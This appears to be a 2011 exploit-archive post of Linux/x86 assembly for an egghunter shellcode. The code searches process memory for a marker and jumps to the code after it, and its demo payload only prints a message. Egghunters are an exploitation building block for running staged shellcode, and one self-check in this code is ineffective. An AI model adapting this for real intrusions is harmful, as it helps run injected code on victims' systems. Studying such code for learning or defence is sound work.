/*
Exploit Title: Linux/x86 egghunt shellcode
Date: 21-07-2011
Author: Ali Raheem
Tested on:
Linux Ali-PC.home 2.6.38.8-35.fc15.x86_64 #1 SMP Wed Jul 6 13:58:54 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Linux injustice 2.6.38-10-generic #46-Ubuntu SMP Tue Jun 28 15:05:41 UTC 2011 i686 i686 i386 GNU/Linux
http://codepad.org/tkSONxY5 Code pad lets you execute code live check here for a live demostration
Thanks: Stealth- for testing and codepad.com for being so useful.
[ali@Ali-PC asm]$ cat egghunter.s
section .data
    egg equ "3Gg!" ;this is the egg marker
section .text
    global  _start
_start:
    mov eax, _start ;0x8048080 is a good safe starting point
_next:
    inc eax
_isEgg:
    cmp dword [eax-4],egg
    jne _next
    cmp eax,ebx
    jmp eax
*/
section .data
    msg db "We found the egg!",0ah,0dh
    msg_len equ $-msg
    egg equ "3Gg!"
section .text
    global  _start
;This simple egg will print msg if we find it
_egg:
    db  "3Gg!"                  ;Start your egg with this marker
    mov eax,4
    mov ebx,1
    mov ecx,msg
    mov edx,msg_len
    int 80h
    mov eax,1
    int 80h
_start:
    mov eax, 0x8048080
_next:
    inc eax
_isEgg:
    cmp dword [eax-4],egg ;is this our marker?
    jne _next                   ;No? skip
    cmp eax,ebx                 ;Make sure JNE is not true if we found our self
    jmp eax                     ;Execute the egg